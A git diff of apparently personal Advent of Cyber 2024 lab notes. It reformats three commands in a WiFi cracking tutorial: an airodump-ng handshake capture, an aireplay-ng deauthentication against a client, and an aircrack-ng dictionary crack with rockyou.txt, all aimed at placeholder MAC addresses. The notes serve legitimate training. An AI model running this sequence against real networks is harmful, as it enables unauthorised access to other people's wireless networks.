--- a/AOC2024.md
+++ b/AOC2024.md
@@ -188,11 +188,11 @@ Oooh! WiFi cracking! Today we got a quick and simple tutorial how to get the pas
 
 >`sudo airodump-ng wlan2`
 
->`sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2 <-capture`
+>`sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2` capture
 
->`sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2 <- deauth`
+>`sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2` deauth
 
->`sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap <-crack`
+>`sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap` crack
 
 ### DAY TWELVE ###
 
